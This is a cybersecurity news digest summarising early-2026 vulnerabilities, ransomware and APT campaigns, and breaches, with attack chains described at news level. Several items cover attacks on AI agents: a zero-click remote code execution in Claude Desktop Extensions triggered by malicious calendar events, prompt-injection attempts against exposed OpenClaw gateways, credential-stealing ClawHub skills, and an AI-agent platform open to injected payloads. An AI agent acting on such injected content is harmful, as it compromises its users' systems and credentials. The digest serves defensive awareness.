SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has previously released a third patch to address a critical deserialization vulnerability (CVE-2025-26399) in Web Help Desk 12.8.7 and earlier versions. This flaw allows unauthenticated remote code execution (RCE) on affected systems. The vulnerability was discovered by an anonymous researcher and reported through Trend Micro's Zero Day Initiative (ZDI). The flaw is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986. The original vulnerability was exploited in the wild and added to the KEV catalog by CISA. SolarWinds advises users to update to version 12.8.7 HF1 to mitigate the risk. SolarWinds Web Help Desk is a help desk and ticketing suite used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component, and the hotfix requires replacing specific JAR files. Microsoft has revealed that it observed a multi-stage intrusion that involved the threat actors exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. The attackers used legitimate components associated with Zoho ManageEngine to enable persistent remote control over the infected system. They enumerated sensitive domain users and groups, established persistence via reverse SSH and RDP access, and conducted a DCSync attack to request password hashes and other sensitive information from an Active Directory (AD) database. Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

Threat actors, assessed to be China-based Storm-2603, have started using the Velociraptor digital forensics and incident response (DFIR) tool in ransomware attacks deploying LockBit and Babuk ransomware. The attackers exploited a privilege escalation vulnerability in an outdated version of Velociraptor to gain persistent access and control over virtual machines. The campaign involved creating local admin accounts, disabling security features, and using fileless PowerShell encryptors for data exfiltration and encryption. The ransomware deployed on Windows systems was identified as LockBit, while a Linux binary detected as Babuk ransomware was found on VMware ESXi systems. Storm-2603 initially exploited SharePoint vulnerabilities in July 2025 and deployed Warlock, LockBit, and Babuk ransomware on VMware ESXi servers in August 2025. Sophos CTU researchers first documented Velociraptor abuse by Storm-2603 on August 5, 2025. Storm-2603 used the ToolShell exploit to gain initial access and deployed an outdated version of Velociraptor (version 0.73.4.0) that is susceptible to a privilege escalation vulnerability (CVE-2025-6264) to enable arbitrary command execution and endpoint takeover. The group also used Smbexec to remotely launch programs using the SMB protocol and modified Active Directory (AD) Group Policy Objects (GPOs) to disable real-time protection. Storm-2603 established the infrastructure for the AK47 C2 framework in March 2025 and created the first prototype of the tool the next month. The group pivoted from LockBit-only deployment to dual LockBit/Warlock deployment in April 2025 and used the ToolShell exploit as a zero-day in July 2025. Storm-2603 demonstrated operational flexibility and sophisticated builder expertise using leaked and open-source ransomware frameworks. In a recent breach, SmarterTools confirmed that the Warlock ransomware gang breached its network on January 29, 2026, via a single SmarterMail virtual machine (VM) set up by an employee. The vulnerability exploited in the attack to gain access is CVE-2026-23760, an authentication bypass flaw in SmarterMail before Build 9518, which allows resetting administrator passwords and obtaining full privileges. The attackers moved laterally from that one vulnerable VM via Active Directory, using Windows-centric tooling and persistence methods. The ransomware operators waited roughly a week after gaining initial access, the final stage being encryption of all reachable machines. Sentinel One security products reportedly stopped the final payload from performing encryption, the impacted systems were isolated, and data was restored from fresh backups. Tools used in the attacks include Velociraptor, SimpleHelp, and vulnerable versions of WinRAR, while startup items and scheduled tasks were also used for persistence. ReliaQuest reported that Storm-2603 chains CVE-2026-23760 access with the software’s built-in 'Volume Mount' feature to gain full system control. ReliaQuest also saw probes for CVE-2026-24423, another SmarterMail flaw flagged by CISA as actively exploited by ransomware actors, although the primary vector was CVE-2026-23760.

A critical zero-click remote code execution (RCE) vulnerability in Claude Desktop Extensions (DXT) allows attackers to compromise systems via malicious Google Calendar events. The flaw, rated CVSS 10.0, affects over 10,000 users. Anthropic, the developer, declined to fix it, stating it falls outside their threat model. The vulnerability arises from the lack of security boundaries in the Model Context Protocol (MCP) used by Claude DXT, which executes with full system privileges.

Chinese state-sponsored APT actors have **dramatically escalated cyber operations against Taiwan and expanded into Southeast Asia**, with Taiwan’s National Security Bureau (NSB) reporting **960,620,609 intrusion attempts** in 2025—a **6% year-over-year increase** and **112.5% surge since 2023**. The **energy sector** faced a **tenfold spike in attacks**, while **emergency/hospital systems** saw a **54% rise**, including **ransomware deployments** disrupting operations in at least **20 hospitals** and stolen medical data sold on dark web forums. In **February 2026**, Singapore’s Cyber Security Agency (CSA) disclosed that **UNC3886**—a China-nexus APT group—launched a **targeted cyber espionage campaign** against all four of Singapore’s major telecommunications operators (**M1, SIMBA Telecom, Singtel, StarHub**). The actors **weaponized a zero-day exploit** to bypass perimeter defenses, deployed **rootkits for persistence**, and exfiltrated technical data, though no personal customer data was compromised. Singapore’s **CYBER GUARDIAN** operation successfully disrupted UNC3886’s access and expanded monitoring capabilities. The campaigns, attributed to **BlackTech, Flax Typhoon, Mustang Panda, APT41, and UNC3886**, leverage **hardware/software vulnerabilities, DDoS, social engineering, and supply-chain compromises**, often correlating with **PLA military drills, political events, and visits by Taiwanese officials**. Taiwan’s NSB is now collaborating with **30+ countries** on joint investigations, while advisories from **CISA, NSA, and allies** warn of a shift from espionage to **potential disruptive capabilities**. Earlier phases targeted **U.S. government agencies (CBO, Treasury, CFIUS)**, **European telecoms**, and global critical infrastructure via exploits in **Cisco, Ivanti, Palo Alto, and Citrix devices**.

Two Connecticut men, Amitoj Kapoor and Siddharth Lillaney, have been charged with defrauding FanDuel and other online gambling sites of $3 million over several years using stolen identities of approximately 3,000 victims. The scheme involved purchasing stolen personally identifiable information (PII) from darknet markets and Telegram, creating fraudulent accounts, and exploiting promotional bonuses. The defendants used background-check services to verify identities and organized stolen data in a spreadsheet. They transferred winnings to virtual stored-value cards and moved fraudulent proceeds to their bank and investment accounts. The indictment was returned by a federal grand jury in New Haven on February 3, 2026, and the defendants were released on a $300,000 bond each pending further proceedings.

VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware.

Attackers are leveraging contextual language from organizations' public-facing content to create targeted password wordlists, significantly improving their success rates in credential attacks. Tools like CeWL, an open-source web crawler, extract relevant terminology from websites, which attackers then transform into plausible password guesses. This method bypasses standard complexity requirements and exploits users' tendency to incorporate familiar organizational language into their passwords. The effectiveness of this approach lies in its relevance to the organization's internal vocabulary, making it more likely to match users' password patterns. Defenders are advised to implement controls that block context-derived and known-compromised passwords, enforce longer passphrases, and enable multi-factor authentication (MFA) to mitigate these attacks.

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability.

OpenClaw, an AI agent platform, faces significant security concerns as attackers exploit its ecosystem. Malicious skills on ClawHub, a public skills registry, have been discovered, and threat actors are discussing the deployment of OpenClaw skills for botnet operations. The number of malicious packages on npm and PyPI with the name 'claw' has surged, providing new avenues for threat actors. Additionally, attackers are actively scanning exposed OpenClaw gateways, attempting prompt injection and command execution. These developments highlight the risks associated with AI agents' broad permissions and unsupervised deployment.

Warlock ransomware, potentially linked to Black Basta, targets unpatched on-premises Microsoft SharePoint servers. The ransomware leverages multiple vulnerabilities (CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, CVE-2025-53771) to gain initial access, escalate privileges, and deploy ransomware. The campaign includes extensive reconnaissance and evasion techniques, targeting security software to avoid detection. The threat actor Storm-2603, associated with China-backed groups, has been observed using Warlock ransomware in these attacks. The ransomware gang recently auctioned files stolen from Colt Technology Services, confirming customer data was compromised. Organizations are urged to apply available patches and implement comprehensive security measures to mitigate the risk. The ToolShell exploit chain, involving CVE-2025-53770 and CVE-2025-53771, was first publicly disclosed in mid-July 2025. Chinese-based threat groups Linen Typhoon and Violet Typhoon have been actively targeting SharePoint vulnerabilities since July 2025. Active exploitation of ToolShell vulnerabilities was first observed on July 18, 2025, a day before Microsoft's emergency advisory. Cisco Talos reported that nearly all their incident response engagements related to ToolShell activity began within 10 days of the vulnerabilities being disclosed. Network segmentation is crucial to prevent lateral movement within an organization following a ToolShell exploit. Recently, SmarterTools fell victim to a ransomware attack through an unpatched instance of its SmarterMail email server. The incident occurred on January 29 and impacted the company’s office network and a data center hosting quality control testing systems, SmarterTools’ portal, and its Hosted SmarterTrack network. The attack was perpetrated by the Warlock ransomware group, which is believed to be operating out of China. The hackers likely exploited CVE-2026-24423, an unauthenticated remote code execution (RCE) vulnerability that was patched on January 15. Customers are advised to update to the latest version of SmarterMail as soon as possible.

Top Chief Information Security Officers (CISOs) are addressing SOC team burnout and reducing Mean Time to Respond (MTTR) by implementing sandbox-first investigation workflows and automating triage. This approach provides faster, clearer behavior evidence, reducing escalations, decision fatigue, and manual steps. The method has shown significant improvements in SOC output, MTTR reduction, and team retention without additional hiring.

BridgePay, a major U.S. payment gateway provider, confirmed a ransomware attack caused a widespread outage across its platform, affecting multiple services. The incident began on February 6, 2026, and led to significant disruptions for merchants and payment integrators. BridgePay engaged federal law enforcement and forensic teams, reporting no evidence of payment card data compromise. Initial forensic findings indicate that any data accessed by attackers were encrypted. Recovery efforts are ongoing, with no estimated time for full restoration.

The Bloody Wolf APT group, also tracked as Stan Ghouls, has expanded its operations to include Russia, targeting government entities, logistics companies, medical facilities, and educational institutions. The campaign has infected about 50 victims in Uzbekistan and 10 devices in Russia, with additional infections identified in Kazakhstan, Turkey, Serbia, and Belarus. The group has shifted from traditional malware to using legitimate remote-access software, specifically NetSupport RAT, deployed via Java-based delivery methods. The campaign involves sophisticated social engineering tactics, including impersonating government ministries and using geofenced infrastructure to deliver malicious payloads. The group's activities have been ongoing since at least June 2025, with a notable increase in operations by October 2025. The campaign has targeted finance, government, and information technology (IT) sectors. The shift to legitimate remote-administration tools indicates an evolution in the group's tactics to evade detection and blend into normal IT activity. The group has also expanded its malware arsenal to target IoT devices, with Mirai botnet payloads staged on associated infrastructure.

Microsoft is addressing a bug in its anti-spam service that incorrectly blocks URLs in Exchange Online and Microsoft Teams, causing some emails to be quarantined. The issue began on September 5, 2025, affecting users who received false alerts about malicious URLs. Over 6,000 URLs have been identified as affected, and Microsoft is working to unblock them and recover any incorrectly flagged messages. The bug is due to the anti-spam engine mistakenly tagging URLs within other URLs as potentially malicious. Microsoft has deployed a partial fix and is continuing to address the impact. The incident has been classified as an event with noticeable user impact, although the exact number of affected customers and regions remains undisclosed. In a new development, on February 5, 2026, another incident began where Exchange Online mistakenly flags legitimate emails as phishing and quarantines them. This issue is caused by a new URL rule that incorrectly flags some URLs as malicious. Microsoft is working to release quarantined emails and confirm that legitimate URLs are unblocked. Similar issues have occurred throughout the year, including a May 2025 incident where a machine learning model incorrectly flagged Gmail emails as spam in Exchange Online.

Social media platforms earned nearly £3.8bn ($5.2bn) from malicious ads in Europe in 2025, with 993 billion ad impressions linked to scams. The report by Juniper Research highlights the need for better detection, enforcement, and user education to combat scam ads and maintain user trust. The report predicts a surge to 1.4 trillion impressions by 2030, potentially increasing revenue from scam ads to £8.4bn unless more protections are implemented.

The European Commission is investigating a breach in its mobile device management platform, which may have exposed staff personal information. The attack was detected on January 30, 2026, and contained within 9 hours. The breach is linked to vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) software, similar to recent attacks on Dutch institutions. The compromised data includes names, phone numbers, and business email addresses of staff members. The Commission's response included cleaning the system, but no compromise of mobile devices was detected. The incident follows the Commission's proposal of new cybersecurity legislation to strengthen defenses against state-backed and cybercrime groups.

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the FBI and the UK's National Cyber Security Centre (NCSC), has issued a joint alert warning about the risks posed by discontinued edge devices. These devices, which include firewalls, IoT devices, load balancers, network security appliances, routers, switches, wireless access points, and other software and hardware appliances, are often targeted by state-sponsored threat actors for network access, persistence, and data theft. CISA has issued Binding Operational Directive 26-02, mandating federal agencies to decommission and replace end-of-life (EOL) edge devices within 12 to 18 months. Agencies must also establish continuous discovery processes to identify and manage devices approaching end-of-support status within 24 months. CISA has developed an end-of-support edge device list to assist agencies in this effort. On February 5, 2026, CISA issued BOD 26-02, emphasizing the immediate actions required by federal agencies, including updating supported edge devices running EOS software within three months and decommissioning identified EOS edge devices within 18 months.

TeamPCP, a threat cluster active since November 2025, has conducted a worm-driven campaign targeting cloud-native environments to build malicious infrastructure. The campaign, observed around December 25, 2025, leveraged exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and the React2Shell vulnerability (CVE-2025-55182) to compromise servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining. The group operates as a cloud-native cybercrime platform, using misconfigured cloud services and known vulnerabilities to create a self-propagating criminal ecosystem. TeamPCP's activities include deploying various payloads such as proxy.sh, scanner.py, kube.py, react.py, and pcpcat.py to exploit and expand their reach within cloud environments. The group's operations are opportunistic, targeting AWS and Microsoft Azure environments, and have resulted in data leaks and extortion activities.

A new open-source tool called Tirith has been released to detect and block homoglyph attacks in command-line environments. The tool analyzes URLs in typed commands to prevent execution of deceptive attacks that use lookalike characters from different alphabets. Tirith supports multiple shells and operating systems, providing real-time protection against various types of terminal-based attacks.

A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These addons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands which then steals crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords.

A previously undocumented cyber espionage group, TGR-STA-1030, has compromised at least 70 government and critical infrastructure organizations across 37 countries over the past year. The group, assessed to be of Asian origin, leverages phishing emails and exploits N-day vulnerabilities to deploy malware and maintain long-term access for espionage purposes. Targets include national law enforcement, ministries of finance, and departments related to economic, trade, natural resources, and diplomatic functions. The group uses a variety of tools, including Cobalt Strike, Behinder, Godzilla, and a Linux kernel rootkit named ShadowGuard. The group conducted reconnaissance activity targeting government entities connected to 155 countries between November and December 2025 and showed increased interest in scanning entities across North, Central, and South America during the U.S. government shutdown in October 2025. The group also exploited at least 15 known vulnerabilities in SAP Solution Manager, Microsoft Exchange Server, D-Link, and Microsoft Windows.

Germany's Federal Office for the Protection of the Constitution (BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carrying out phishing attacks over the Signal messaging app. The focus is on high-ranking targets in politics, the military, and diplomacy, as well as investigative journalists in Germany and Europe. Unauthorized access to messenger accounts not only allows access to confidential private communications but also potentially compromises entire networks. The campaign involves threat actors masquerading as 'Signal Support' or a support chatbot named 'Signal Security ChatBot' to initiate direct contact with prospective targets, urging them to provide a PIN or verification code received via SMS, or risk facing data loss. Should the victim comply, the attackers can register the account and gain access to the victim's profile, settings, contacts, and block list through a device and mobile phone number under their control. There also exists an alternative infection sequence that takes advantage of the device linking option to trick victims into scanning a QR code, thereby granting the attackers access to the victim's account, including their messages for the last 45 days, on a device managed by them. The security authorities warned that while the current focus of the campaign appears to be Signal, the attack can also be extended to WhatsApp since it also incorporates similar device linking and PIN features as part of two-step verification. Similar attacks have been orchestrated by multiple Russia-aligned threat clusters tracked as Star Blizzard, UNC5792 (aka UAC-0195), and UNC4221 (aka UAC-0185).

Cybersecurity researchers have uncovered a China-linked adversary-in-the-middle (AitM) framework called DKnife, active since at least 2019. The framework targets routers and edge devices to perform deep packet inspection, manipulate traffic, and deliver malware. It primarily targets Chinese-speaking users by harvesting credentials and delivering malware via popular Chinese services and applications. DKnife comprises seven Linux-based implants that enable a wide range of malicious activities, including DNS hijacking, binary download hijacking, and real-time user activity monitoring. The framework is linked to the Earth Minotaur threat activity cluster and shares infrastructural connections with WizardNet, a Windows implant deployed by TheWizards APT group. DKnife's infrastructure overlaps with a campaign delivering WizardNet, suggesting a shared development or operational lineage. The framework uses a component called yitiji.bin to create a bridged TAP interface on the router at the private IP address 10.3.3.3, allowing the threat actor to intercept and rewrite network packets in transit to the intended host. Additionally, DKnife monitors WeChat activities more analytically, tracking voice and video calls, text messages, images sent and received, and articles read on the platform.

SmarterTools has addressed a critical unauthenticated remote code execution (RCE) flaw in SmarterMail email software, tracked as CVE-2026-24423 with a CVSS score of 9.3. The vulnerability allows attackers to execute arbitrary OS commands by pointing SmarterMail to a malicious HTTP server. The flaw was discovered by researchers from watchTowr, CODE WHITE GmbH, and VulnCheck and was patched in version Build 9511, released on January 15, 2026. CISA has added CVE-2026-24423 to its KEV catalog, marking it as actively exploited in ransomware campaigns, and has given federal agencies until February 26, 2026, to patch or stop using affected versions. Additionally, another critical flaw (CVE-2026-23760) and a medium-severity vulnerability (CVE-2026-25067) were also addressed in subsequent updates.

The Electronic Frontier Foundation (EFF) has launched the 'Encrypt It Already' campaign urging major technology and communications companies to prioritize end-to-end encryption (E2EE) for user data and communications. The initiative focuses on three key areas: releasing promised E2EE features, enabling them by default, and launching data protection capabilities already available from competitors. The campaign highlights companies like Bluesky, Ring, and Google for their delayed or optional E2EE implementations. The EFF emphasizes the importance of E2EE in protecting user privacy from third-party access, including law enforcement and government agencies. The campaign also addresses the growing privacy concerns exacerbated by the rise of artificial intelligence (AI) and its potential for misuse. The EFF aims to hold companies accountable for their privacy promises and empower users to control their data.

Substack has confirmed a data breach that occurred in October 2025, during which attackers stole email addresses and phone numbers. The breach was detected on February 3, 2026, and confirmed via an email notification to users on February 5, 2026. Substack assured users that no credentials or financial information were accessed. A threat actor later leaked a database containing 697,313 records on BreachForums, claiming the data was scraped. Substack has patched the vulnerability and warned users about potential phishing attempts. Substack has a history of privacy incidents, including a 2020 email exposure. The platform has grown significantly since its launch in 2017, reaching over 50 million active subscriptions, including five million paid, by March 2025.

Modern enterprise work heavily relies on browsers for accessing SaaS applications, identity providers, and AI tools. However, traditional security architectures focus on endpoints, networks, and email, leaving a significant visibility gap in browser activities. This gap allows a class of browser-only attacks to evade detection and investigation, posing a growing challenge for security teams. In 2026, browser attacks continue to leave little traditional evidence, making them difficult to detect and mitigate. These attacks include clickfix and UI-driven social engineering, malicious extensions, man-in-the-browser attacks, and HTML smuggling. Each of these attack types exploits the lack of visibility into browser activities, making them hard to prevent and investigate. The gap in browser-level observability is widening due to the increasing use of AI tools and AI-native browsers, which normalize actions like copying, pasting, and uploading sensitive information. This makes it even more challenging for security teams to evaluate risks and set effective controls.

The European Commission is imposing a fine on TikTok for violating the Digital Services Act (DSA) due to its addictive design features, including infinite scroll, autoplay, and personalized recommendations. The commission found that TikTok failed to assess the potential harm to users' physical and mental well-being, particularly minors and vulnerable adults. The fine could reach up to 6% of TikTok's global annual turnover if the findings are confirmed. TikTok is required to modify its core service design to include screen time breaks and disable addictive features.

A new tool called KEV Collider has been developed to help security teams better triage the Known Exploited Vulnerabilities (KEV) Catalog by the US Cyber and Infrastructure Security Agency (CISA). The tool allows teams to filter vulnerabilities based on various criteria, making the list more relevant to their environments. The KEV Catalog, while useful, does not always align with the cybersecurity priorities of most organizations, often including vulnerabilities that are low-severity or low-probability for many companies. The KEV Collider integrates data from the KEV Catalog with other sources like CVSS scores, EPSS scores, and Metasploit exploit availability to provide a more comprehensive view. The tool aims to help security teams make better decisions about which vulnerabilities to prioritize, especially as the number of vulnerabilities continues to grow. The creator, Tod Beardsley, emphasizes that the KEV Catalog should not be treated as a must-patch list for all organizations, as it is primarily tailored to the needs of the federal civilian executive branch.